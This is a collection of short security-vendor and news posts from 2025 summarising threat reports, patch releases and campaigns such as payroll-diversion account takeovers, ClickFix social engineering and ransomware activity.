Token theft is the cybersecurity version of valet fraud.🔑 You hand over the keys. The valet makes a copy. Later, they take your car for a joyride. SOC Analyst Faith Stratton breaks down how it works and why it’s so effective.👇

The Microsoft Digital Defense Report 2025 shows how threats are evolving faster than ever, fueled by AI. msft.it/6017sf36v Key insights from report include: -More than 50% of cyberattacks with known motives had financial objectives such as extortion or ransom, while only 4% were motivated solely by espionage. -For initial access, attacks targeted well-known exposure footprint, including web-facing assets (18%), external remote services (12%), and supply chains (3%). -Meanwhile, identity-based attacks rose by 32%. More than 97% of identity attacks are password spray or brute force attacks. -There has been an 87% increase in campaigns aimed at disrupting customer cloud environments through ransomware, mass deletion, or other destructive actions. -Threat actors have begun using AI in malicious activities, including automated vulnerability discovery, phishing, malware or deepfake generation, data analysis, and crafting highly convincing fraudulent messages. The report is rich with findings and observations like these on a wide range of topics, including cybercrime, identity attacks, ransomware, fraud, social engineering, cloud threats, and nation-state threat actors. At @Microsoft, we’re taking action against these threats by disrupting cybercriminal ecosystems, sharing threat intelligence, and investing in proactive defenses to protect people, data, and critical systems. AI is reshaping both threats and defenses. With responsible AI and cross-sector collaboration, organizations can reduce risk, safeguard identities, and build resilient systems. Read the Microsoft Digital Defense Report 2025 for more insights and defense guidance.

The October 2025 security updates are available:

Microsoft Threat Intelligence has observed a financially motivated threat actor, Storm-2657, compromising employee accounts to gain unauthorized access to profiles and divert salary payments to attacker-controlled accounts. msft.it/6016s0hvp Storm-2657 is actively targeting a range of US-based organizations, particularly employees in sectors like higher education, with such "payroll pirate" attacks to gain access to third-party human resources (HR) software as a service (SaaS) platforms like Workday. These attacks leverage sophisticated social engineering tactics and take advantage of the complete lack of multifactor authentication (MFA) or lack of phishing-resistant MFA to compromise accounts. While the observed campaign specifically targeted Workday profiles, any SaaS systems storing HR or payment and bank account information could be easily targeted with the same technique. Learn more about Storm-2657’s campaign and the TTPs employed, and get comprehensive detection, hunting queries, and guidance for investigation and remediation to defend against this threat in this Microsoft Threat Intelligence blog.

Over the past year, Microsoft Threat Intelligence and Microsoft Defender Experts have observed the ClickFix social engineering technique growing in popularity, with campaigns targeting thousands of enterprise and end-user devices daily. msft.it/6010snbHo This technique exploits users’ tendency to resolve technical issues by tricking them into running malicious commands. These commands, in turn, deliver payloads that ultimately lead to information theft and exfiltration. Our latest blog discusses the elements that make up a ClickFix campaign, from different arrival vectors and lure implementations, to various defense evasion methods. Because ClickFix requires human action to execute the malicious commands, it could circumvent conventional and automated security defenses. Organizations can therefore mitigate its impact by educating users to recognize its lures and implementing device-hardening policies. Read more of our analysis and detection and mitigation recommendations.

The August 2025 security updates are available:

Update: Microsoft has released security updates that fully protect customers using all supported versions of SharePoint affected by CVE-2025-53770 and CVE-2025-53771.

The June 2025 security updates are available:

KeeperPAM is now on CISA’s CDM Approved Products List. Trusted to protect federal agencies with zero-trust privileged access management. Secure passwords, accounts and remote access with Keeper Federal 👉 bit.ly/4j7z10Z. #KeeperSecurity #Cybersecurity

🚨 Mandiant Threat Defense is investigating an UNC6032 campaign that utilizes fake “AI video generator” websites to distribute infostealer and other malware. Get the details, and learn how to stay ahead of this threat: bit.ly/3H7AWFJ

The May 2025 security updates are available:

The notable developments in the ransomware ecosystem in the first quarter of 2025 range from a nation-state ransomware threat actor acting as a ransomware-as-a-service (RaaS) affiliate to deploy commodity ransomware for the first time to another threat actor expanding their hybrid cloud environment compromise techniques. These shifts are combined with tried-and-tested techniques like exploitation of newly disclosed vulnerabilities and social engineering. Microsoft Threat Intelligence observed the North Korean state actor Moonstone Sleet deploying Qilin ransomware in limited attacks. This is the first time that the actor, who previously exclusively used custom ransomware, deployed ransomware from a RaaS operator. Storm-0501 resumed campaigns where they were observed moving laterally from on-premises environments to the cloud. In recent attacks, Storm-0501 targeted unmanaged devices and used an insecure hybrid account to move laterally, gain access to resources, and delete backups before sending an extortion message. Microsoft previously reported on Storm-0501: msft.it/6011S6VuW The leak of Black Basta ransomware group chat messages in February revealed their key techniques, like use of Citrix, Jenkins, and virtual private network (VPN) exploits, weak ESXi authentication, and compromised SSH for lateral movement. Black Basta is a closed ransomware offering that first appeared in April 2022 and has been used by multiple threat actors. The leaked chat indicated an overlap in activity between Storm-1674, Storm-1811, and Sangria Tempest. There was little change in activity from Storm-1674, one of the most active ransomware threat actors this quarter, but activity from Storm-1811 seemed to stop shortly after the leak. In addition to Storm-1674, the most active threat actors were Lace Tempest, Storm-0249, and Storm-1175. Storm-1175 was observed exploiting critical vulnerabilities CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728 in remote monitoring and management (RMM) tool SimpleHelp shortly after these were disclosed and patched in January to deploy Medusa ransomware. Fake IT scams continued to be the initial access technique used by many ransomware actors. Storm-2410 initiated contact with targets through fake IT calls, followed by the use of client management tool Quick Assist or the QEMU emulation software to remotely gain a foothold in the environment. Similarly, Storm-1674 was observed using fake IT calls through Microsoft Teams, leading to Quick Assist and PowerShell usage. Storm-1674 was observed using PowerShell leading to the Noiserv command-and-control (C2) framework.

The April 2025 security updates are available:

Happy birthday, @gmail! 🥳 We have a surprise: Enterprise users can send end-to-end encrypted (E2EE) messages to any user on any email inbox with just a few clicks (despite the timing, this is not a joke). → goo.gle/3E1eX1T

🚨 Apple just patched a zero-day under active attack! CVE-2025-24201 lets hackers escape the WebKit sandbox—Apple calls the exploit “extremely sophisticated.” Targeted? Unknown Duration? Unknown But if you use an iPhone, Mac, or Vision Pro—update NOW. 📲 Details: thehackernews.com/2025/03/ap…

The March 2025 security updates are available:

No shock: Infostealers stay stealing In fact, we saw them more than ANY other threat in 2024 Credentials, passwords, network names—hackers are after it all. @Laughing_Mantis stopped by #TradecraftTuesday to share some expert insights

🚨 Mandiant has detected threat actors leveraging x86-64 compiled macOS malware, likely due to broader compatibility and relaxed execution policies. Understand how to investigate these intrusions → bit.ly/4haFZ4j

North Korea has long been involved cyber operations. Recent tactics involve the use of fake identities to get hired as IT workers at major companies. These operations are now moving beyond the U.S., with a notable focus on Europe. Learn more: bit.ly/41y3O08

Microsoft Says One Million Devices Impacted by Infostealer Campaign securityweek.com/microsoft-s…